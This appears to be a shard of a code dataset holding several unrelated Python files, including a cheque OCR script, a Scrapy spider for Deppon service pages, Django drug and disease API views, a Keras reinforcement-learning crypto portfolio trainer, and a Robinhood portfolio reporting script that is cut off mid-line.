scores[row]>0.12:\r\n \r\n croppedImage = imr[boxes[row][1]:boxes[row][3],boxes[row][0]:boxes[row][2]]\r\n sub_row ={}\r\n if 'MICR'==labels[classes[row]-1]:\r\n text = pytesseract.image_to_string(croppedImage,lang='mcr') \r\n sub_row['ocr'] = text \r\n sub_row['pos'] = boxes[row] \r\n recognized['MICR'] = sub_row \r\n elif 'Signature' !=labels[classes[row]-1]:\r\n text,conf = region_ocr(croppedImage)\r\n sub_row['ocr'] =text\r\n sub_row['pos'] = boxes[row]\r\n sub_row['confidence'] = conf\r\n recognized[labels[classes[row]-1]] = sub_row\r\n \r\n end_time = time.time()\r\n \r\n print('predicted time', end_time-start_time)\r\n\r\n \r\n filename =output_path+\"/\"+fileName[0:-3]+'.json'\r\n with open(filename, 'w') as f:\r\n f.write(json.dumps(recognized , ensure_ascii=False, indent=2, separators=(',', ': '))) \r\n\r\n \r\n print(\"output files saved in \"+output_path)\r\n","repo_name":"dsabarinathan/cheque-extract","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"14247039813","text":"# -*- coding: utf-8-*-\n# 命名比较标准了 selenium 6 24 99\nfrom shunfeng.items import ServiceItem\nfrom shunfeng.items import TypeItem\nfrom shunfeng.util import Extract\nimport scrapy\n\nclass DebangSpider(scrapy.Spider):\n name = 'debang'\n allowed_domains = ['www.deppon.com']\n start_urls = ['https://www.deppon.com/newwebsite/products',\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917d4a04a2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1', \n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e5204b2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e7404b4&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce916eee03e6&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1']\n \n \n ValueAddedServicesrUrls = [\n #其他\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917d4a04a2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #代收货款 \n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e5204b2&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #报价运输\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce917e7404b4&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1',\n #安全包装\n 'https://www.deppon.com/newwebsite/products/detail?contentid=ff80808165ce45970165ce916eee03e6&tagname=%E4%BA%A7%E5%93%81%E4%BB%8B%E7%BB%8D-%E5%A2%9E%E5%80%BC%E6%9C%8D%E5%8A%A1'\n ]\n links = []\n prefix = '德邦快递-'\n def parse(self, response):\n if response.url == self.start_urls[0]:\n ulNodes = response.xpath('//div[@class=\"row no-gutters align-content-center white\"]')[1].xpath('.//ul') \n typeItem = TypeItem()\n for ul in ulNodes :\n aNodes = ul.xpath('./li/a')\n for i,aNode in enumerate(aNodes):\n if i == 0:\n typeItem['typeName'] = self.prefix + aNode.xpath('./text()').extract()[0]\n else:\n if typeItem['typeName'] != '德邦快递-增值服务':\n self.links.append(aNode.xpath('./@href').extract()[0])\n typeItem['serviceName'] = self.prefix + aNode.xpath('./text()').extract()[0]\n# yield typeItem\n yield(typeItem)\n typeItem['typeName'] = self.prefix + '增值服务'\n typeItem['serviceName'] = self.prefix + '超重货操作费'\n yield typeItem\n #yield('#',typeItem)\n for link in self.links: \n link = link.replace('{{baseUrl}}','https://www.deppon.com/newwebsite')\n yield scrapy.Request(link, callback=self.parse)\n elif response.url in self.ValueAddedServicesrUrls:\n serviceItem = ServiceItem()\n if response.url == self.ValueAddedServicesrUrls[0]:\n nodes = response.xpath('//section[@class=\"component fs14 lh24 border_line\"]') \n for node in nodes:\n text = ''\n ps = node.xpath('.//p')\n for p in ps:\n t = Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceName'] = self.prefix + t\n serviceItem['serviceItemName'] = '服务介绍'\n text = ''\n elif 'fs18 lh28' in ptext or '18px' in ptext:\n if p != ps[1]:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceName'] = self.prefix + t\n serviceItem['serviceItemName'] = '服务介绍'\n text = ''\n elif '24' in ptext or '15px' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + t\n serviceItem['serviceName'] = '德邦快递-超重货操作费'\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '单件货物重量大于500KG且小于等于1000KG范围内,收取超重货操作服务费100元/件;单件货物重量大于1000KG且小于等于2000KG范围内,收取超重货操作服务费200元/件;若一票货中多件货物满足超重货操作费收取标准,则这一票货收取的重货操作服务费为各件超重货操作费总和。'\n yield(serviceItem)\n elif response.url == self.ValueAddedServicesrUrls[1]: \n ps = response.xpath('//section[@class=\"component fs14 lh24 border_line\"]/p')\n text = ''\n serviceItem['serviceName'] = self.prefix + '代收货款'\n for p in ps:\n t = Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceItemName'] = t\n text = ''\n elif '28' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + t\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '提供“即日退”和“三日退”两种代收货款服务。替您收回货款后,在承诺的退款时效内将货款汇出,让您安全、及时地回笼资金'\n yield(serviceItem)\n elif response.url == self.ValueAddedServicesrUrls[2]:\n ps = response.xpath('//section[@class=\"fs14 lh24 border_line\"]/p')\n text = ''\n serviceItem['serviceName'] = self.prefix + '保价运输'\n for p in ps:\n t = Extract.extractNodeText(p)\n ptext = p.extract()\n if p == ps[-1]:\n text = text+t\n serviceItem['serviceItemDesc'] = text\n text =''\n yield(serviceItem)\n elif p == ps[0]:\n serviceItem['serviceItemName'] = t\n text = ''\n elif '28' in ptext:\n serviceItem['serviceItemDesc'] = text\n yield(serviceItem)\n serviceItem['serviceItemName'] = t\n text = ''\n else:\n text = text + '\\n' + t\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '保价运输是指德邦与您共同确定的以托运人申明货物价值为基础的一种特殊运输方式。您向德邦声明托运货物的实际价值,若货物出险,即可获得我司的相应赔偿'\n yield(serviceItem)\n else: \n serviceItem['serviceName'] = self.prefix + '安全包装服务'\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = '德邦将为您的货物量身定制安全放心的包装解决方案,让您更安心'\n yield(serviceItem)\n serviceItem['serviceItemName'] = '服务区域'\n serviceItem['serviceItemDesc'] = '中国大陆地区、香港地区'\n yield(serviceItem)\n cardNodes = response.xpath('//div[@class = \"card-body\"]')\n for card in cardNodes:\n if card.xpath('./h4') != []:\n serviceItem['serviceItemName'] = card.xpath('./h4/text()').extract()[0]\n serviceItem['serviceItemDesc'] = card.xpath('./p/text()').extract()[0]\n elif card.xpath('./p[2]') != []:\n serviceItem['serviceItemName'] = '包装材料介绍-' + card.xpath('./p[1]/text()').extract()[0]\n serviceItem['serviceItemDesc'] = card.xpath('./p[2]/text()').extract()[0]\n else:\n serviceItem['serviceItemDesc'] = '新型塑料缓冲材料,质地轻、透明性好,良好的减震性、抗冲击性,是易碎易损货物包装的首选良材'\n serviceItem['serviceItemName'] = '包装材料介绍-' + card.xpath('./p[1]/text()').extract()[0]\n yield(serviceItem)\n else:\n serviceItem = ServiceItem()\n #serviceName serviceItemName serviceItemDesc\n pNodes = response.xpath('//section[@class = \"content_wrapper h-100\"]/section/section/p')\n for i,p in enumerate(pNodes):\n if i == 0:\n serviceItem['serviceName'] = self.prefix +Extract.extractNodeText(p)\n yield(serviceItem['serviceName'])\n if i == 1:\n serviceItem['serviceItemName'] = '服务介绍'\n serviceItem['serviceItemDesc'] = Extract.extractNodeText(p)\n yield(serviceItem)\n cardNodes = response.xpath('//div[@class = \"card-body\"]')\n for card in cardNodes:\n if card.xpath('./h4') == []:\n continue\n else:\n serviceItem['serviceItemName'] = '产品优势-' + card.xpath('./h4/text()').extract()[0]\n if card.xpath('./p') == []:\n serviceItem['serviceItemDesc'] = card.xpath('./ul/li/text()').extract()[0]\n else:\n serviceItem['serviceItemDesc'] = card.xpath('./p/text()').extract()[0]\n yield(serviceItem)","repo_name":"ZPS233/Baidubaidke-spider","sub_path":"shunfeng/spiders/debang.py","file_name":"debang.py","file_ext":"py","file_size_in_byte":11064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42991543226","text":"from django.shortcuts import render\nfrom .serializers import *\nfrom .models import *\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\n\nimport pandas as pd\n\n\n# Creating views here.\n@api_view([\"GET\"])\ndef get_all_disease(request, disease_name):\n # print(disease_name)\n if request.method == \"GET\":\n try:\n disease = Disease.objects.get(DiseaseName=disease_name)\n serializedData = DiseaseSerializer(disease)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data)\n \n@api_view([\"GET\"])\ndef get_all_smil(request, disease_name):\n # print(disease_name)\n if request.method == \"GET\":\n try:\n disease = Disease.objects.get(DiseaseName=disease_name)\n # print(disease)\n drugs = disease.drugs_for_disease.exclude(DrugSMIL = 'default_value')\n drugs = drugs.filter(ClinicalStatus = 'Phase 3')[0:5]\n # print(drugs)\n serializedData = DrugSMILSerializer(drugs, many=True)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data) \n\n@api_view([\"GET\"])\ndef get_all_drugs(request, drug_name):\n # print(drug_name)\n if request.method == \"GET\":\n try:\n drug = Drug.objects.get(DrugName=drug_name)\n serializedData = DiseaseSerializer(drug)\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n return Response(serializedData.data)\n\n\n\n\n@api_view([\"GET\"])\ndef create_database(request):\n # df = pd.read_excel('DrugXDiseaseMapping.xlsx')\n\n disease_id = \"234\"\n disease_name = \"aml\"\n\n drug_id = \"567\"\n drug_name = \"ALD\"\n clinical_status = \"Phase-1\"\n\n target_id = \"789\"\n target_name = \"DNA TOPO\"\n\n df = pd.read_excel('DrugXDiseaseMapping.xlsx')\n df2 = pd.read_excel('TargetXDrug.xlsx')\n df3 = pd.read_excel('TargetIDXTargetName.xlsx')\n\n # df = pd.DataFrame(df, columns=['DrugUID', 'DrugName', \n # 'DiseaseName', 'DiseaseID', \"ClinicalStatus\"])\n\n Drugs = []\n Targets = []\n i=0\n for ind in df.index:\n i+=1\n print(i)\n DrugUID = df['DrugUID'][ind]\n for ind2 in df2.index:\n # print(DrugUID)\n if df2['DrugID'][ind2] == DrugUID:\n for ind3 in df3.index:\n\n if df3['TargetID'][ind3] == df2['TargetID'][ind2]:\n\n DrugUID = df['DrugUID'][ind]\n # print(\"DiseaseName:\", df['DiseaseName'][ind], \"\\tDrugUID:\", df['DrugUID'][ind], \"\\tDrugName:\", df['DrugName'][ind])\n # print(\"TargetName:\", df3['TargetName'][ind3])\n\n disease_id = df['DiseaseID'][ind]\n disease_name = df['DiseaseName'][ind]\n\n drug_id = df['DrugUID'][ind]\n drug_name = df['DrugName'][ind]\n clinical_status = df['ClinicalStatus'][ind]\n\n target_id = df2['TargetID'][ind2]\n target_name = df3['TargetName'][ind3]\n\n\n\n try:\n temp_d = Disease.objects.get(DiseaseID = disease_id)\n except:\n temp_d = Disease(DiseaseID=disease_id, DiseaseName=disease_name)\n temp_d.save()\n\n # print(temp_d) \n\n try:\n temp_drug = Drug.objects.get(DrugID = drug_id)\n except:\n temp_drug = Drug(DrugID=drug_id, DrugName=drug_name,ClinicalStatus= clinical_status)\n temp_drug.save() \n temp_drug.Diseases.add(temp_d)\n\n # print(temp_drug) \n\n try:\n temp_t = Target.objects.get(TargetID = target_id)\n except:\n temp_t = Target(TargetID=target_id, TargetName=target_name)\n temp_t.save()\n temp_t.Diseases.add(temp_d)\n temp_t.Drugs.add(temp_drug)\n\n if request.method == \"GET\":\n\n return Response(status=status.HTTP_201_CREATED) \n\n# @api_view([\"POST\"])\n# def post_disease(request):\n# # print(\"Posting\")\n# if request.method == \"POST\":\n# # print(\"Posting23\")\n# serialized_bloodtest_data = BloodTestSerializer(data=request.data)\n \n# if serialized_bloodtest_data.is_valid():\n# serialized_bloodtest_data.save()\n\n# return Response(status=status.HTTP_201_CREATED)\n# return Response(\n# serialized_bloodtest_data.errors, status=status.HTTP_400_BAD_REQUEST\n# )\n\n# @api_view([\"POST\"])\n# def post_bloodtest_data(request):\n# # print(\"Posting\")\n# if request.method == \"POST\":\n# # print(\"Posting23\")\n# serialized_bloodtest_data = BloodTestSerializer(data=request.data)\n \n# if serialized_bloodtest_data.is_valid():\n# serialized_bloodtest_data.save()\n\n# return Response(status=status.HTTP_201_CREATED)\n# return Response(\n# serialized_bloodtest_data.errors, status=status.HTTP_400_BAD_REQUEST\n# )\n\n\n\n# @api_view([\"GET\"])\n# def get_bloodtest_data(request):\n# if request.method == \"GET\":\n# bloodtest_data = BloodTestData.objects.all()\n# serializedData = BloodTestSerializer(bloodtest_data, many=True)\n# return Response(serializedData.data)\n \n\n@api_view([\"GET\"])\ndef push_smil(request):\n\n df = pd.read_excel('23.xlsx')\n\n for ind in df.index:\n drug_id = df['DrugUID'][ind]\n drug_smil = df['DrugSMIL'][ind]\n\n try:\n drug = Drug.objects.get(DrugID=drug_id)\n except:\n continue\n\n drug.DrugSMIL = drug_smil\n drug.save()\n # print(drug_id, drug.DrugID, drug.DrugName, drug.DrugSMIL, drug_smil)\n\n\n\n\n if request.method == \"GET\":\n return Response(status=status.HTTP_201_CREATED)\n ","repo_name":"emonmeena/targetid","sub_path":"drugdiscovery/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44028234347","text":"#coding: utf-8\n\nimport os\nimport re\nfrom unittest import TestCase\nfrom io import BytesIO, open\n\nfrom baraag.evernote import enml_to_markdown\n\nFIXTURES_DIR = os.path.join(\n os.path.abspath(os.path.dirname(__file__)), 'fixtures')\n\nclass TestEnmlToMarkdown(TestCase):\n\n def test_convert_simple(self):\n self._test_convert('simple')\n\n def test_convert_multibyte(self):\n self._test_convert('multibyte')\n\n def test_convert_image(self):\n self._test_convert('image')\n\n def _test_convert(self, fixture):\n enml_path = os.path.join(FIXTURES_DIR, '%s_content.enml' % fixture)\n expected_md_path = re.sub(r'enml$', 'md', enml_path)\n\n with open(enml_path, 'rb') as enml_file, open(expected_md_path, 'rb') as expected_file:\n\n converted = BytesIO()\n enml_to_markdown(enml_file, converted, '/images/')\n\n self.assertEqual(converted.getvalue(), expected_file.read().rstrip())\n\n","repo_name":"orangain/baraag","sub_path":"baraag/tests/test_evernote.py","file_name":"test_evernote.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"37176164039","text":"from agent import *\nfrom environment import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nN_ASSETS = 15\nbatch_size = 10\nmax_experiences = 100\nmin_experiences = 1\nagent = Agent(N_ASSETS, batch_size, max_experiences, min_experiences)\nenv = CryptoEnvironment()\n\nwindow_size = 180\nN = 300\n# rebalance_period = 90 ignoring rebalancing for now\ncopy_step = 25\nportfolio_size = N_ASSETS\naction_size = 3\ninput_shape = (portfolio_size, portfolio_size, )\nhidden_units = [100, 50]\ncopy_steps = 10\nnum_expReplay = 0\nTargetNet = DQNModel(input_shape, hidden_units, action_size, portfolio_size)\n\ndef train():\n global num_expReplay\n for e in range(N):\n agent.is_eval = False\n data_length = len(env.train_prices) #total data available for training\n\n returns_history = []\n rewards_history = []\n\n #for equal weight allocation case - base case\n returns_history_equal = []\n equal_rewards = []\n\n actionBuffer = []\n\n print(\"Episode \" + str(e) + \"/\" + str(N), 'epsilon', agent.epsilon)\n\n random_start = np.random.randint(window_size+1, data_length-window_size-1)\n s = env.get_state(random_start, random_start+window_size) #any state of len window_size\n total_profit = 0\n iter = 0\n\n for comp_period in range(window_size, data_length):\n #, rebalance_period):\n\n start_period = comp_period-window_size #-rebalance_period\n\n s_ = env.get_state(start_period, comp_period) #for first iteration - start till window_size\n action = agent.policy(s_)\n actionBuffer.append(action)\n\n weighted_returns, reward = env.get_reward(action, start_period, comp_period)\n weighted_returns_equal, reward_equal = env.get_reward(\n np.ones(agent.portfolio_size) / agent.portfolio_size, start_period, comp_period)\n\n rewards_history.append(reward)\n equal_rewards.append(reward_equal)\n returns_history.extend(weighted_returns)\n returns_history_equal.extend(weighted_returns_equal)\n\n done = True if comp_period == data_length else False\n agent.add_experience({\"s\": s, \"s2\": s_, \"a\": action, \"r\": reward, \"done\": done}) #adding this iteration vars to experience buffer\n num_expReplay+=1\n\n if num_expReplay >= batch_size: #start training only if there are enough examples in replay buffer\n agent.train(TargetNet.get_model())\n s = s_\n if iter % 30 == 0:\n print(iter)\n iter+=1\n\n if iter % copy_steps == 0: #copying the weights to TargetNet at specified intervals\n TargetNet.copy_weights(agent.train_model)\n\n if agent.epsilon > agent.epsilon_min:\n agent.epsilon *= agent.epsilon_decay\n print(\"Epsilon: \" + str(agent.epsilon))\n\n model_json = agent.train_model.to_json()\n with open(\"models/model.json\", \"w\") as json_file:\n json_file.write(model_json)\n agent.train_model.save_weights(\"models/model\" + str(e) + \".h5\")\n\n rl_result = np.array(returns_history).cumsum()\n equal_result = np.array(returns_history_equal).cumsum()\n\n print(\"Done\")\n\n plt.figure(figsize = (12, 2))\n plt.plot(rl_result, color = 'black', ls = '-')\n plt.plot(equal_result, color = 'red', ls = '--')\n plt.show()\n\n plt.figure(figsize = (12, 2))\n for a in actionBuffer:\n plt.bar(np.arange(N_ASSETS), a, color = 'red', alpha = 0.25)\n plt.xticks(np.arange(N_ASSETS), env.train_data.columns, rotation='vertical')\n plt.show()\n\nif __name__ == '__main__':\n train()\n","repo_name":"pia-nyk/CryptoCoach","sub_path":"reinforcement_learning/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31922090941","text":"import datetime\nimport logging\nimport os\nimport uuid\n\nimport pytest\n\nfrom kubeflow.examples.notebook_tests import nb_test_util\nfrom kubeflow.testing import util\n\ndef test_mnist_gcp(record_xml_attribute, name, namespace, # pylint: disable=too-many-branches,too-many-statements\n repos, image):\n '''Generate Job and summit.'''\n util.set_pytest_junit(record_xml_attribute, \"test_mnist\")\n\n if not name:\n name = \"mnist-\" + datetime.datetime.now().strftime(\"%H%M%S\") + \"-\"\n name = name + uuid.uuid4().hex[0:3]\n\n util.set_pytest_junit(record_xml_attribute, \"test_mnist_gcp\")\n\n notebook_path = \"kubeflow/examples/mnist/mnist_gcp.ipynb\"\n nb_test_util.run_papermill_job(notebook_path, name, namespace, repos, image)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format=('%(levelname)s|%(asctime)s'\n '|%(pathname)s|%(lineno)d| %(message)s'),\n datefmt='%Y-%m-%dT%H:%M:%S',\n )\n logging.getLogger().setLevel(logging.INFO)\n pytest.main()\n","repo_name":"qq2016/kubeflow_learning","sub_path":"py/kubeflow/examples/notebook_tests/mnist_gcp_test.py","file_name":"mnist_gcp_test.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12848955358","text":"import Robinhood\nimport stock_categories\nimport logging\nimport argparse\nimport getpass\nimport time\n\n_START_TIMESTAMP = time.strftime(\"%y%m%d_%H%M%S\") # used in filenames\n\nclass RobinhoodManager():\n\tdef __init__(self, username, password):\n\t\tself._trader = Robinhood.Robinhood()\n\t\tself._cached_portfolio_dictionary = None\n\t\tself._cached_positions_dictionary = None\n\n\t\ttry:\n\t\t\tlogged_in = self._trader.login(username=username, password=password)\n\t\texcept Robinhood.exceptions.LoginFailed:\n\t\t\traise RuntimeError(\"Login failed, wrong password?\")\n\n\tdef _update_portfolio_dictionary(self):\n\n\t\tportfolio = self._trader.portfolios()\n\t\t# Example portfolio dictionary:\n\t\t# {'account': 'https://api.robinhood.com/accounts/123456789/',\n\t\t# \"Adjusted\" values show how much equity you would have had\n\t\t# yesterday, adjusted by any new/pending deposits. This allows\n\t\t# calculating gains/losses between yesterday & today.\n\t\t# 'adjusted_equity_previous_close': '1234.5678',\n\t\t# 'adjusted_portfolio_equity_previous_close': '1234.5678',\n\t\t# 'equity': '1234.5678',\n\t\t# 'equity_previous_close': '1234.5678',\n\t\t# 'portfolio_equity_previous_close': '1234.5678',\n\t\t# 'excess_maintenance': '1234.5678',\n\t\t# 'excess_maintenance_with_uncleared_deposits': '1234.5678',\n\t\t# 'excess_margin': '1234.5678',\n\t\t# 'excess_margin_with_uncleared_deposits': '1234.5678',\n\t\t# 'extended_hours_equity': '1234.5678',\n\t\t# 'extended_hours_market_value': '1234.5678',\n\t\t# 'extended_hours_portfolio_equity': '1234.5678',\n\t\t# 'last_core_equity': '1234.5678',\n\t\t# 'last_core_market_value': '1234.5678',\n\t\t# 'last_core_portfolio_equity': '1234.5678',\n\t\t# 'market_value': '1234.5678',\n\t\t# 'start_date': '2020-01-01',\n\t\t# 'unwithdrawable_deposits': '0.0000',\n\t\t# 'unwithdrawable_grants': '0.0000',\n\t\t# 'url': 'https://api.robinhood.com/portfolios/123456789/',\n\t\t# 'withdrawable_amount': '1234.5678'}\n\n\t\tequity = float(portfolio['equity'])\n\t\tequity_previous_close = float(portfolio['adjusted_equity_previous_close'])\n\t\tcash_amount = equity - float(portfolio['market_value'])\n\n\t\tresult_dict = {\n\t\t\t\"equity\": equity,\n\t\t\t\"equity_previous_close\": equity_previous_close,\n\t\t\t\"equity_percent_change_today\": (equity - equity_previous_close) / equity_previous_close,\n\t\t\t\"cash_amount\": cash_amount,\n\t\t\t\"cash_percentage\": float(cash_amount / equity)\n\t\t}\n\t\tself._cached_portfolio_dictionary = result_dict\n\n\t@property\n\tdef portfolio_dictionary(self):\n\t\tif self._cached_portfolio_dictionary is None:\n\t\t\tself._update_portfolio_dictionary()\n\n\t\treturn self._cached_portfolio_dictionary\n\n\tdef portfolio_readable_string(self):\n\t\tportfolio = self.portfolio_dictionary\n\t\treturn \"${:.2f} {:+.1f}%; ${:.2f} ({:.0f}%) cash\".format(\n\t\t\tportfolio[\"equity\"],\n\t\t\tportfolio[\"equity_percent_change_today\"]*100,\n\t\t\tportfolio[\"cash_amount\"],\n\t\t\tportfolio[\"cash_percentage\"]*100,\n\t\t)\n\n\tdef _update_positions_dictionary(self):\n\t\tpositions = self._trader.positions()['results']\t\t\n\t\tnumber_of_positions = int(len(positions))\n\t\tresults = {}\n\t\t\n\t\tfor position in positions:\n\t\t\tquantity = float(position['quantity'])\n\t\t\taverage_buy_price = float(position[\"average_buy_price\"])\n\n\t\t\tinstrument = self._trader.session.get(position['instrument'], timeout=15).json()\n\t\t\tsymbol = instrument[\"symbol\"]\n\t\t\tname = instrument[\"simple_name\"]\n\n\t\t\tquote = self._trader.quote_data(symbol)\n\t\t\tcurrent_price = float(quote[\"last_trade_price\"])\n\t\t\tprevious_close_price = float(quote[\"previous_close\"])\n\t\t\tprice_change_percent_today = (current_price - previous_close_price) / previous_close_price\n\n\t\t\ttotal_cost = quantity * average_buy_price\n\t\t\ttotal_value = quantity * current_price\n\t\t\ttotal_return_amount = total_value - total_cost\n\t\t\ttotal_return_percent = 0 if total_cost == 0 else total_return_amount / total_cost\n\n\t\t\tresults[symbol] = {\n\t\t\t\t\"symbol\": symbol,\n\t\t\t\t\"quantity\": quantity,\n\t\t\t\t\"average_buy_price\": average_buy_price,\n\t\t\t\t\"current_price\": current_price,\n\t\t\t\t\"previous_close_price\": previous_close_price,\n\t\t\t\t\"price_change_percent_today\": price_change_percent_today*100,\n\t\t\t\t\"total_cost\": total_cost,\n\t\t\t\t\"total_value\": total_value,\n\t\t\t\t\"total_return_amount\": total_return_amount,\n\t\t\t\t\"total_return_percent\": total_return_percent*100,\n\t\t\t}\n\n\t\tself._cached_positions_dictionary = results\n\n\t@property\n\tdef positions_dictionary(self):\n\t\tif self._cached_positions_dictionary is None:\n\t\t\tself._update_positions_dictionary()\n\n\t\treturn self._cached_positions_dictionary\n\n\tdef positions_csv(self):\n\t\toutput = \"{},{},{},{},{},{}\\r\\n\".format(\n\t\t\t\"Symbol\",\n\t\t\t\"Price\",\n\t\t\t\"Change\",\n\t\t\t\"Equity\",\n\t\t\t\"Cost\",\n\t\t\t\"Return\",\n\t\t)\n\t\tfor symbol in self.positions_dictionary:\n\t\t\tentry = self.positions_dictionary[symbol]\n\t\t\toutput += \"{},{},{},{},{},{}\\r\\n\".format(\n\t\t\t\tformat(\"{}\".format(entry[\"symbol\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"current_price\"])),\n\t\t\t\tformat(\"{:.2f}%\".format(entry[\"price_change_percent_today\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"total_value\"])),\n\t\t\t\tformat(\"${:.3f}\".format(entry[\"total_cost\"])),\n\t\t\t\tformat(\"{:.2f}%\".format(entry[\"total_return_percent\"])),\n\t\t\t)\n\t\treturn output\n\n\tdef positions_readable_table(self):\n\t\tprint(\"{:<7}{:>8}{:>8}{:>8}{:>8}{:>8}\".format(\n\t\t\t\"Symbol\",\n\t\t\t\"Price\",\n\t\t\t\"Change\",\n\t\t\t\"Equity\",\n\t\t\t\"Cost\",\n\t\t\t\"Return\",\n\t\t))\n\t\tfor symbol in self.positions_dictionary:\n\t\t\tentry = self.positions_dictionary[symbol]\n\t\t\tprint(\"{:<7}{:>8}{:>8}{:>8}{:>8}{:>8}\".format(\n\t\t\t\tformat(\"{}\".format(entry[\"symbol\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"current_price\"])),\n\t\t\t\tformat(\"{:+.1f}%\".format(entry[\"price_change_percent_today\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"total_value\"])),\n\t\t\t\tformat(\"${:.2f}\".format(entry[\"total_cost\"])),\n\t\t\t\tformat(\"{:+.1f}%\".format(entry[\"total_return_percent\"])),\n\t\t\t))\n\n\ndef print_section_header(text):\n\tprint()\n\tprint(\"{:#^66s}\".format(' ' + text + ' '))\n\n\ndef main():\n\tparser = argparse.ArgumentParser(description='Display information for a Robinhood account.')\n\n\tparser.add_argument('--categories_file', type=argparse.FileType('r'),\n\t\tdefault='stock_categories.csv', help='location of the stock categories CSV file')\n\tparser.add_argument('--output_csv_location',\n\t\tdefault='stock_holdings_{}.csv'.format(_START_TIMESTAMP),\n\t\thelp='location to save current stock data')\n\tparser.add_argument('--username', help='account username')\n\targs = parser.parse_args()\n\n\t# repeatedly ask for credentials + login until successful\n\twhile True:\n\t\tif args.username:\n\t\t\tusername = args.username\n\t\telse:\n\t\t\tusername = input('Robinhood Username: ')\n\n\t\tpassword = getpass.getpass(prompt='Robinhood Password: ')\n\t\ttry:\n\t\t\tr = RobinhoodManager(username, password)\n\t\texcept Exception as e:\n\t\t\tprint(\"Failed to login to Robinhood, try again. (Error:{})\".format(e))\n\t\telse:\n\t\t\tbreak\n\n\tsc = stock_categories.StockCategories(args.categories_file)\n\n\n\t## Print basic portfolio stats\n\tprint_section_header(\"Robinhood\")\n\tprint(f\"Equity: {r.portfolio_readable_string()}\")\n\tprint(\"Reserved cash: ${:.0f} / ${:.0f} ({:.0f}%)\".format(\n\t\tr.portfolio_dictionary['cash_amount'],\n\t\tsc.get_minimum_cash_amount(),\n\t\t100.0 * r.portfolio_dictionary['cash_amount'] / sc.get_minimum_cash_amount()))\n\n\n\t## Print portfolio positions in a table\n\tprint_section_header(\"Positions\")\n\tr.positions_readable_table()\n\twith open(args.output_csv_location, 'w') as handle:\n\t\tprint(r.positions_csv(), file=handle)\n\n\n\t## Print categories used to balance portfolio\n\tprint_section_header(\"Portfolio balance\")\n\tprint(\"{:<30}{:>7}{:>7}{:>7} {}\".format(\"Category\", \"Ideal\", \"Actual\", \"Needed\", \"Holdings\"))\n\tfor category in sc.get_categories():\n\t\tallocation_to_category = 0\n\t\tstocks_in_category = sc.get_tickers_in_category(category.name)\n\t\tfor ticker in stocks_in_category:\n\t\t\tif ticker.name == 